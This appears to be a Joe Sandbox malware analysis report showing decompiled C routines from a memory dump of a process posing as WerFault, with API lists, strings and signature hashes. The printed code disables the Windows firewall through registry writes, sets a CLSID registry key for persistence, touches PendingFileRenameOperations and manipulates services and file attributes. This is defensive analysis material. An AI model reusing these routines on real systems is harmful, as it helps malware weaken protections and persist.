						if(_t24 == 0xffffffff) {
							_t24 = 0;
						} else {
							_t16 = 1;
						}
						if(_t21 != 0xffffffff) {
							SetFileAttributesW( *0x289f2e8 + 0x1646, _t21); // executed
						}
						 *0x289f828(_t24, 2, 2);
						 *0x28a0660 = _t24;
						return _t16;
					}
				} else {
					L1:
					return 0;
				}
			}









                        0x028833e4
                        0x028833ed
                        0x028833f7
                        0x02883403
                        0x00000000
                        0x02883405
                        0x02883408
                        0x0288340e
                        0x02883417
                        0x02883425
                        0x02883425
                        0x02883442
                        0x02883448
                        0x0288344d
                        0x02883453
                        0x0288344f
                        0x0288344f
                        0x0288344f
                        0x02883458
                        0x02883466
                        0x02883466
                        0x02883471
                        0x02883478
                        0x02883482
                        0x02883482
                        0x028833f9
                        0x028833f9
                        0x028833fc
                        0x028833fc

                        APIs
                        • GetFileAttributesW.KERNEL32(?,?,?,00000000,02883528,?,00000000,?,?,0286FCFA), ref: 02883408
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,02883528,?,00000000,?,?,0286FCFA), ref: 02883425
                        • CreateFileW.KERNEL32(?,00010000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,02883528,?,00000000), ref: 02883442
                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000000,02883528,?,00000000,?,?,0286FCFA), ref: 02883466
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Attributes$Create
                        • String ID:
                        • API String ID: 1801647141-0
                        • Opcode ID: a6078fe62d8f85461580ef1dec4b0e2aaf73a7e63695267fc63db4b54c46fa75
                        • Instruction ID: 0c337e9c9729fe7201b90c06eb7046aaddeb8cc261165f76bc0f36c901d19bc1
                        • Opcode Fuzzy Hash: a6078fe62d8f85461580ef1dec4b0e2aaf73a7e63695267fc63db4b54c46fa75
                        • Instruction Fuzzy Hash: 1301267EE802106BD7246EACFC89FD6225DD799B69F1C4A21F205D36C0CB3188608794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288E905 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                        Download Yara Rule
                        C-Code - Quality: 55%
                        			E0288E905(signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v52;
				struct tagMSG _v80;
				char _v340;
				signed int _t40;
				signed int _t50;
				void* _t52;
				void* _t54;
				signed int _t55;
				void* _t57;
				signed int _t58;
				void* _t59;
				void* _t67;
				signed int _t71;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t92;
				void* _t94;
				signed int _t98;
				signed int _t100;
				void* _t101;

				if(_a4 == 0) {
					return 0;
				}
				_t87 =  *0x289f2e8;
				__eflags = E0286D774( *(_t87 + 4) & 0x0000ffff) - 1;
				if(__eflags == 0) {
					__eflags =  *(_t87 + 0xa) & 0x00000010;
					if(__eflags == 0) {
						E028846D8(_t87, __eflags);
					}
				}
				_t98 = E0288E7D9(_t87, __eflags);
				E028614DB(_t87,  &_v52, 0, 0x20);
				_t40 =  *0x289f544;
				__eflags = _t40;
				if(_t40 != 0) {
					 *_t40(0x4a, 1);
				}
				__eflags = _t98;
				if(_t98 != 0) {
					_t88 =  *0x289f2e8;
					__eflags = E0286D774( *(_t88 + 4) & 0x0000ffff) - 1;
					if(__eflags == 0) {
						 *(_t88 + 0x15e) = _t98;
					}
					 *0x28a4104 = _t98;
					 *0x28a4100 = E028845E1(_t88, __eflags);
					_v20 =  *( *0x289f2e8 + 4) & 0x0000ffff;
					_v16 =  *0x289f848(_t94);
					_v12 = E0288F18D;
					_v8 = _t98;
					E028614DB(_t88,  &_v52, 0, 0x20);
					_t50 = E02861844( *0x289fdb4,  &_v52);
					__eflags = _t50;
					if(_t50 != 0) {
						E02862FDA(0x2890294,  &_v52,  &_v20, 0x10); // executed
					}
					while(1) {
						_t52 =  *0x289fa50( &_v80, 0, 0, 0);
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							break;
						}
						__eflags =  *0x289ec92;
						if( *0x289ec92 == 0) {
							break;
						}
						__eflags = _v80.message - 0x12;
						if(_v80.message != 0x12) {
							 *0x289fa44( &_v80);
							DispatchMessageA( &_v80); // executed
						}
					}
					_t92 =  *0x289f2e8;
					_t54 = E0286D774( *(_t92 + 4) & 0x0000ffff);
					__eflags = _t54 - 1;
					if(_t54 == 1) {
						 *((intOrPtr*)(_t92 + 0x15e)) = 0;
					}
					_t55 = E028619D6( &_v52);
					__eflags = _t55;
					if(_t55 != 0) {
						_t58 = E028619D6(0x2890294);
						__eflags = _t58;
						if(_t58 != 0) {
							_t93 = _t92 + 0x2632;
							_t91 = _t92 + 0x2632;
							_t59 = E028619D6(_t92 + 0x2632);
							__eflags = _t59 - 8;
							if(_t59 >= 8) {
								_t100 = E02864664(_t93);
								__eflags = _t100;
								if(_t100 != 0) {
									E028614DB(_t91,  &_v340, 0, 0x104);
									 *0x289fa84( &_v340, "Software\\Classes\\CLSID\\%s\\%08X\\%s", _t100,  *((intOrPtr*)( *0x289f2e8 + 0x2616)), 0x2890294);
									E028617E4(_t100);
									_t67 = E02866091();
									_t101 = _t67;
									_a4 = 0;
									 *0x289f968( *0x289ec4a, 0x4d2);
									_t71 =  *0x289fae0(0x80000001,  &_v340, 0, 2,  &_a4);
									__eflags = _t71;
									if(_t71 == 0) {
										__eflags = _a4;
										if(_a4 != 0) {
											 *0x289fae8(_a4,  &_v52);
											 *0x289fb1c(_a4);
										}
									}
									__eflags = _t101 - 1;
									if(_t101 == 1) {
										 *0x289f968( *0x289ec4a, 0);
									}
								}
							}
						}
					}
					_t57 = 1;
					__eflags = 1;
					goto L29;
				} else {
					_t57 = 0;
					L29:
					return _t57;
				}
			}



























                        0x0288e914
                        0x00000000
                        0x0288e916
                        0x0288e91d
                        0x0288e92d
                        0x0288e92f
                        0x0288e931
                        0x0288e935
                        0x0288e937
                        0x0288e937
                        0x0288e935
                        0x0288e944
                        0x0288e94b
                        0x0288e950
                        0x0288e955
                        0x0288e957
                        0x0288e95d
                        0x0288e95d
                        0x0288e95f
                        0x0288e961
                        0x0288e96a
                        0x0288e97a
                        0x0288e97c
                        0x0288e97e
                        0x0288e97e
                        0x0288e985
                        0x0288e990
                        0x0288e99e
                        0x0288e9a9
                        0x0288e9b1
                        0x0288e9b8
                        0x0288e9bb
                        0x0288e9ca
                        0x0288e9d4
                        0x0288e9d6
                        0x0288e9e3
                        0x0288e9e3
                        0x0288ea0c
                        0x0288ea13
                        0x0288ea19
                        0x0288ea1c
                        0x00000000
                        0x00000000
                        0x0288e9ea
                        0x0288e9f0
                        0x00000000
                        0x00000000
                        0x0288e9f2
                        0x0288e9f6
                        0x0288e9fc
                        0x0288ea06
                        0x0288ea06
                        0x0288e9f6
                        0x0288ea1e
                        0x0288ea29
                        0x0288ea2e
                        0x0288ea30
                        0x0288ea32
                        0x0288ea32
                        0x0288ea3b
                        0x0288ea40
                        0x0288ea42
                        0x0288ea4a
                        0x0288ea4f
                        0x0288ea51
                        0x0288ea57
                        0x0288ea5d
                        0x0288ea5f
                        0x0288ea64
                        0x0288ea67
                        0x0288ea73
                        0x0288ea75
                        0x0288ea77
                        0x0288ea8a
                        0x0288eaa8
                        0x0288eab2
                        0x0288eab7
                        0x0288eac7
                        0x0288eac9
                        0x0288eacc
                        0x0288eae5
                        0x0288eaeb
                        0x0288eaed
                        0x0288eaef
                        0x0288eaf2
                        0x0288eafb
                        0x0288eb04
                        0x0288eb04
                        0x0288eaf2
                        0x0288eb0a
                        0x0288eb0d
                        0x0288eb16
                        0x0288eb16
                        0x0288eb0d
                        0x0288ea77
                        0x0288ea67
                        0x0288ea51
                        0x0288eb1e
                        0x0288eb1e
                        0x00000000
                        0x0288e963
                        0x0288e963
                        0x0288eb20
                        0x00000000
                        0x0288eb20

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: CW1$Software\Classes\CLSID\%s\%08X\%s
                        • API String ID: 0-3954956548
                        • Opcode ID: 2a52dbef479af3209a6b32e1a82151a9e67a7bd6688e355634fef9786c2610de
                        • Instruction ID: c4a5b82342af3eaae8ba87aade31420f4486e9bc730e7a1c333d412ee6a7eb90
                        • Opcode Fuzzy Hash: 2a52dbef479af3209a6b32e1a82151a9e67a7bd6688e355634fef9786c2610de
                        • Instruction Fuzzy Hash: 6751C27DD40108BBDB14BFA4DC88EFE7BADAB14305F084826F60AE6581D7748961CF65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288058A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E0288058A(void* __ebx, void* __ecx, short* __esi, void* _a4) {
				void* _v8;
				char _v24;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				short* _t110;
				intOrPtr _t112;
				intOrPtr _t114;
				intOrPtr _t117;
				void* _t120;
				short* _t136;
				signed int _t145;

				_t136 = __esi;
				_t120 = __ebx;
				if(__esi == 0 ||  *__esi != 0x2a ||  *((intOrPtr*)(__esi + 0x16)) == 0 ||  *((intOrPtr*)(__esi + 0x1e)) == 0) {
					__eflags = 0;
					return 0;
				} else {
					_v8 = 0;
					E02861493(__ecx,  *((intOrPtr*)(__esi + 0x12)),  *0x289f2e8, 0x2672);
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x172)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x1a)) =  *((intOrPtr*)(__esi + 0xe));
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x1e)) =  *((intOrPtr*)(__esi + 0x16));
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x12e)) =  *((intOrPtr*)(__esi + 0x1e));
					_t127 =  *((intOrPtr*)(__esi + 0x1a));
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x11e)) =  *((intOrPtr*)(__esi + 0x1a));
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x142)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x15a)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x2666)) = 0;
					if( *((intOrPtr*)(__esi + 0x1a)) == 0) {
						 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x122)) = 0;
						 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x126)) = 0;
					}
					_push(_t120);
					if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) == 1) {
						 *((short*)( *((intOrPtr*)(_t136 + 0x12)) + 4)) = 0;
						_t117 =  *((intOrPtr*)(_t136 + 0x12));
						_t127 = 0x80;
						_t34 = _t117 + 4;
						 *_t34 =  *(_t117 + 4) | 0x00000080;
						_t145 =  *_t34;
					}
					E028614DB(_t127,  &_v24, 0, 0x10);
					 *0x289fa84( &_v24, "SB:0x%08X",  *((intOrPtr*)(_t136 + 6)));
					if(E0286319B(_t145,  &_v24, 0x43) == 1 || ( *( *0x289f2e8 + 0xa) & 0x00000080) != 0) {
						 *( *((intOrPtr*)(_t136 + 0x12)) + 0xa) =  *( *((intOrPtr*)(_t136 + 0x12)) + 0xa) | 0x00000080;
					}
					_t101 =  *((intOrPtr*)(_t136 + 0x12));
					if( *((intOrPtr*)(_t136 + 0xa)) != 6) {
						_t128 = 0x88;
						 *((short*)(_t101 + 4)) = 0x88;
						_t102 =  *((intOrPtr*)(_t136 + 0x12));
						__eflags =  *(_t102 + 0xa) & 0x00000002;
						if(( *(_t102 + 0xa) & 0x00000002) == 0) {
							_t60 = _t102 + 0xa;
							 *_t60 =  *(_t102 + 0xa) | 0x00000002;
							__eflags =  *_t60;
						}
						_t103 =  *((intOrPtr*)(_t136 + 0x12));
						__eflags =  *(_t103 + 0xa) & 0x00000001;
						if(( *(_t103 + 0xa) & 0x00000001) != 0) {
							_t66 = _t103 + 0xa;
							 *_t66 =  *(_t103 + 0xa) & 0xfffffffe;
							__eflags =  *_t66;
						}
					} else {
						_t128 = 1;
						 *((short*)(_t101 + 4)) = 1;
						_t114 =  *((intOrPtr*)(_t136 + 0x12));
						if(( *(_t114 + 0xa) & 1) == 0) {
							 *(_t114 + 0xa) =  *(_t114 + 0xa) | 1;
						}
					}
					E028614DB(_t128,  *((intOrPtr*)(_t136 + 0x12)) + 0x106, 0, 0x18);
					DuplicateHandle(0xffffffff,  *(_t136 + 0x26), _a4,  &_v8, 0, 0, 2); // executed
					if(_v8 != 0) {
						FindCloseChangeNotification( *(_t136 + 0x26)); // executed
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x12)) + 0x22)) = _v8;
					_t110 =  *((intOrPtr*)(_t136 + 0x22));
					if(_t110 != 0 &&  *_t110 == 0xe) {
						_t112 =  *((intOrPtr*)(_t110 + 2));
						if(_t112 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x12)) + 0x26)) = _t112;
						}
					}
					return 1;
				}
			}















                        0x0288058a
                        0x0288058a
                        0x02880595
                        0x0288073e
                        0x00000000
                        0x028805b7
                        0x028805c2
                        0x028805c8
                        0x028805d0
                        0x028805dc
                        0x028805e5
                        0x028805ee
                        0x028805f7
                        0x028805fa
                        0x02880603
                        0x0288060c
                        0x02880615
                        0x0288061e
                        0x02880623
                        0x0288062c
                        0x0288062c
                        0x0288063b
                        0x02880649
                        0x02880650
                        0x02880654
                        0x02880657
                        0x02880659
                        0x02880659
                        0x02880659
                        0x02880659
                        0x02880668
                        0x02880677
                        0x0288068d
                        0x0288069c
                        0x0288069c
                        0x028806a3
                        0x028806a7
                        0x028806bd
                        0x028806c2
                        0x028806c6
                        0x028806c9
                        0x028806cd
                        0x028806cf
                        0x028806cf
                        0x028806cf
                        0x028806cf
                        0x028806d3
                        0x028806d6
                        0x028806da
                        0x028806dc
                        0x028806dc
                        0x028806dc
                        0x028806dc
                        0x028806a9
                        0x028806ab
                        0x028806ac
                        0x028806b0
                        0x028806b6
                        0x028806b8
                        0x028806b8
                        0x028806b6
                        0x028806ee
                        0x02880703
                        0x0288070c
                        0x02880711
                        0x02880711
                        0x0288071d
                        0x02880720
                        0x02880725
                        0x0288072d
                        0x02880732
                        0x02880737
                        0x02880737
                        0x02880732
                        0x00000000
                        0x0288073a

                        APIs
                        • DuplicateHandle.KERNELBASE(000000FF,?,?,?,00000000,00000000,00000002,?,00000000,00000018,00000043), ref: 02880703
                        • FindCloseChangeNotification.KERNEL32(?), ref: 02880711
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseDuplicateFindHandleNotification
                        • String ID: SB:0x%08X
                        • API String ID: 1784815957-3322750355
                        • Opcode ID: 705693f2d79e4b55e14b71eb5776bc359ab22b95c016e4a0c93045befe2c3664
                        • Instruction ID: f20d08da90cf8f76141a7e696c435b148f406ba79f350524b7ff76f9798acd20
                        • Opcode Fuzzy Hash: 705693f2d79e4b55e14b71eb5776bc359ab22b95c016e4a0c93045befe2c3664
                        • Instruction Fuzzy Hash: 63516E7C6847009FCB38EF58C449EA7B7F1AF48304B15895DE48AC7AA2D331E948DB14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288D99A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.SECHOST(00000000,00000000,00000005,?,?,?,?,?,?,?,?,0286D741), ref: 0288D9A7
                        • OpenServiceW.ADVAPI32(00000000,SSDPSRV,00000016,00000D56,?,?,?,?,?,?,?,?,0286D741), ref: 0288D9C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Open$ManagerService
                        • String ID: SSDPSRV
                        • API String ID: 2351955762-122354904
                        • Opcode ID: c96add33d599a45b20e8f9c2370291c4c3e5797933f4fb78651604f198d3e2f7
                        • Instruction ID: ee1d241b75b7b2a57f1aeeca9f50a3c9df199e83e330f82e350c22e4a6d7ba41
                        • Opcode Fuzzy Hash: c96add33d599a45b20e8f9c2370291c4c3e5797933f4fb78651604f198d3e2f7
                        • Instruction Fuzzy Hash: C011AB7D985224FBCB202F769C4DD9F3EADEF55BA5B240910F20AD24C0DB70C560C660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288A7AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54registryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0288A80E
                        • PendingFileRenameOperations, xrefs: 0288A82D
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                        • API String ID: 3535843008-3023217399
                        • Opcode ID: 8bc180eb4ca7d7f8faf17a610ba29898e12c6b4e39858b5ce267387acb33624f
                        • Instruction ID: 5e60bc2d5b06004718b3ce07745193ce94847031923975d37f3934b25c28913f
                        • Opcode Fuzzy Hash: 8bc180eb4ca7d7f8faf17a610ba29898e12c6b4e39858b5ce267387acb33624f
                        • Instruction Fuzzy Hash: 3C119A7D980208BBDB24DF94DC8CEEEBFBCAF51744F184056B909E2191D3309A91DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02862B27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E02862B27(void* __ecx, short* _a4) {
				void* _v8;
				char _v12;
				void* _t10;
				long _t13;

				_push(__ecx);
				_push(__ecx);
				if(_a4 == 0) {
					L4:
					_t10 = 0;
				} else {
					_v8 = 0;
					_v12 = 0;
					if(E028619E8(_a4) == 0) {
						goto L4;
					} else {
						_t13 = RegCreateKeyExW(0x80000002, _a4, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
						if(_t13 != 0) {
							goto L4;
						} else {
							L02887821(_v8, L"EnableFirewall", 0, 4,  &_v12, 4); // executed
							 *0x289fb1c(_v8);
							_t10 = 1;
						}
					}
				}
				return _t10;
			}







                        0x02862b2a
                        0x02862b2b
                        0x02862b32
                        0x02862b89
                        0x02862b89
                        0x02862b34
                        0x02862b37
                        0x02862b3a
                        0x02862b44
                        0x00000000
                        0x02862b46
                        0x02862b5c
                        0x02862b64
                        0x00000000
                        0x02862b66
                        0x02862b77
                        0x02862b7f
                        0x02862b85
                        0x02862b85
                        0x02862b64
                        0x02862b44
                        0x02862b8d

                        APIs
                        • RegCreateKeyExW.KERNEL32(80000002,02867A3D,00000000,00000000,00000000,00000102,00000000,?,00000000,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s,?,?,?,02867A3D,?), ref: 02862B5C
                        Strings
                        • EnableFirewall, xrefs: 02862B6F
                        • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s, xrefs: 02862B2C
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID: EnableFirewall$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s
                        • API String ID: 2289755597-228630715
                        • Opcode ID: 16685ab5b451a259b300204198eb3d1ac9eb132bc3b2c7d4cab17e1160434812
                        • Instruction ID: a89577f8783c312b7605852a6f11d1598c18cb4b0ac174c7ba0acc35e582838b
                        • Opcode Fuzzy Hash: 16685ab5b451a259b300204198eb3d1ac9eb132bc3b2c7d4cab17e1160434812
                        • Instruction Fuzzy Hash: 69F0817C501129FADF109F91DC4AEEFBF6CDF02760F104055BE08E5140D2708A50DAE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02888F9A Relevance: 4.5, APIs: 3, Instructions: 34COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02888F9A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				int _t18;

				_t23 = __ecx;
				_v20 = __ecx;
				_v8 = _v8 | 0xffffffff;
				_t18 = GetPriorityClass(_v8); // executed
				_v16 = _t18;
				if(_v16 != 0) {
					_t18 = SetPriorityClass(_v8, 0x4000); // executed
				}
				if(_a4 == 0) {
					_t18 = E02888A53(_t23, 1);
				}
				_t24 = _v20;
				_v12 = E0288978C(_t18, _v20, _a4, _a8);
				if(_a4 == 0) {
					E02888A53(_t24, 0);
				}
				if(_v16 != 0) {
					SetPriorityClass(_v8, _v16); // executed
				}
				return _v12;
			}








                        0x02888f9a
                        0x02888fa0
                        0x02888fa3
                        0x02888faa
                        0x02888fb0
                        0x02888fb7
                        0x02888fc1
                        0x02888fc1
                        0x02888fcb
                        0x02888fcf
                        0x02888fcf
                        0x02888fda
                        0x02888fe2
                        0x02888fe9
                        0x02888fed
                        0x02888fed
                        0x02888ff6
                        0x02888ffe
                        0x02888ffe
                        0x02889008

                        APIs
                        • GetPriorityClass.KERNEL32(000000FF,00000000), ref: 02888FAA
                        • SetPriorityClass.KERNEL32(000000FF,00004000), ref: 02888FC1
                        • SetPriorityClass.KERNEL32(000000FF,00000000,00000000,00000000), ref: 02888FFE
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClassPriority
                        • String ID:
                        • API String ID: 2576577285-0
                        • Opcode ID: 52a6e781ff697d8c942f170005eaaa6d259620d8612a845279a0822b106d1b5b
                        • Instruction ID: a576ec7dc1b1995c5cbc13b0d25059db0824584f81d966842919a4580f271b1e
                        • Opcode Fuzzy Hash: 52a6e781ff697d8c942f170005eaaa6d259620d8612a845279a0822b106d1b5b
                        • Instruction Fuzzy Hash: 5801DD3CC0020DFBDF15AFA4D809B9CBB72EF00319F5485A4E625A62E0C7754AA4DF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02884F0A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171COMMON
                        Download Yara Rule
                        C-Code - Quality: 63%
                        			E02884F0A(void* __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed short* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				short _v54;
				char _v56;
				signed int _t79;
				signed int _t82;
				void* _t83;
				signed int* _t87;
				signed int _t95;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t120;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr* _t127;
				signed int _t128;
				intOrPtr _t130;
				void* _t133;
				intOrPtr _t134;
				signed int _t137;
				char* _t139;
				intOrPtr _t140;
				intOrPtr* _t143;

				if(__ecx == 0 || _a8 == 0) {
					L39:
					return _t79 | 0xffffffff;
				} else {
					_t122 = _a12;
					if(_t122 == 0) {
						goto L39;
					}
					_t82 = _a4 * 0x28;
					_t110 = __ecx + _t82;
					_t134 =  *((intOrPtr*)(_t110 + 0x20));
					_v28 = _t82;
					_v36 = _t110;
					_v8 = _t134;
					_v24 = 0;
					_v40 = _t122 -  *(_t110 + 0x24);
					if(_t134 != 0) {
						_t125 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
						_v48 = _t125;
						if( *((intOrPtr*)(_t125 + 0x7c)) != 0) {
							_t133 =  *((intOrPtr*)(_t125 + 0x78)) + _t134;
							_t106 =  *((intOrPtr*)(_t133 + 0x18));
							if(_t106 == 0 ||  *((intOrPtr*)(_t133 + 0x14)) == 0) {
								_push(0xfffffffc);
								L5:
								_pop(_t83);
								return _t83;
							} else {
								_v20 = _v20 & 0x00000000;
								_t127 =  *((intOrPtr*)(_t133 + 0x20)) + _t134;
								_v12 = _t127;
								_v16 =  *((intOrPtr*)(_t133 + 0x24)) + _v8;
								if(_t106 != 0) {
									while(1) {
										_t108 =  *_t127 + _v8;
										_t137 =  *(_t110 + 0x24);
										_t30 = _t82 + 0x2899628; // 0x32335f32
										_v32 = E028850F7(_t108, _t30);
										_t87 = _v40 + _t137;
										_t128 = _t137;
										_v44 = _t87;
										if(_t137 >= _t87) {
											goto L35;
										}
										_t139 = _t137 * 0xc + _a8 + 8;
										while( *((char*)(_t139 + 1)) == _a4 && _t128 < _a12) {
											if(_t108 == 0 ||  *((intOrPtr*)(_t139 - 8)) != _v32 ||  *_t139 != E028619D6(_t108)) {
												_t128 = _t128 + 1;
												_t139 = _t139 + 0xc;
												if(_t128 < _v44) {
													continue;
												}
												goto L35;
											} else {
												_t95 =  *_v16 & 0x0000ffff;
												if(_t95 == 0xffffffff || _t95 >  *((intOrPtr*)(_t133 + 0x14))) {
													return 0;
												} else {
													_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x1c)) + _t95 * 4 + _v8)) + _v8;
													_v44 =  *((intOrPtr*)(_t128 * 0xc + _a8 + 4));
													_t130 =  *((intOrPtr*)(_v28 + 0x2899648));
													if(_t130 == 0) {
														L33:
														if(_t99 != 0) {
															_v24 = _v24 + 1;
															 *_v44 = _t99;
														}
														goto L35;
													}
													_t140 = _v48;
													if(_t140 == 0) {
														goto L33;
													}
													if(_t99 == 0) {
														goto L35;
													}
													_t120 =  *((intOrPtr*)(_t140 + 0x78)) + _t130;
													if(_t99 > _t120 && _t99 <  *((intOrPtr*)(_t140 + 0x7c)) + _t120) {
														_t143 =  *0x289f574;
														if(_t143 == 0) {
															L32:
															_t99 = 0;
															goto L33;
														}
														_v32 = _v32 & 0x00000000;
														_v52 = _t108;
														_v56 = E028619D6(_t108);
														_v54 = _v56 + 1;
														_t105 =  *_t143(_t130,  &_v56, 0,  &_v32); // executed
														if(_t105 < 0) {
															goto L32;
														}
														_t99 = _v32;
													}
													goto L33;
												}
											}
										}
										L35:
										_v20 = _v20 + 1;
										_v12 = _v12 + 4;
										_v16 =  &(_v16[1]);
										if(_v20 <  *((intOrPtr*)(_t133 + 0x18))) {
											_t127 = _v12;
											_t82 = _v28;
											_t110 = _v36;
											continue;
										}
										goto L11;
									}
								}
								L11:
								return _v24;
							}
						}
						_push(0xfffffffd);
						goto L5;
					}
					_push(0xfffffffe);
					goto L5;
				}
			}







































                        0x02884f17
                        0x028850ed
                        0x00000000
                        0x02884f26
                        0x02884f26
                        0x02884f2b
                        0x00000000
                        0x00000000
                        0x02884f34
                        0x02884f37
                        0x02884f39
                        0x02884f3f
                        0x02884f42
                        0x02884f45
                        0x02884f48
                        0x02884f4b
                        0x02884f50
                        0x02884f5d
                        0x02884f5f
                        0x02884f65
                        0x02884f6e
                        0x02884f70
                        0x02884f75
                        0x028850e6
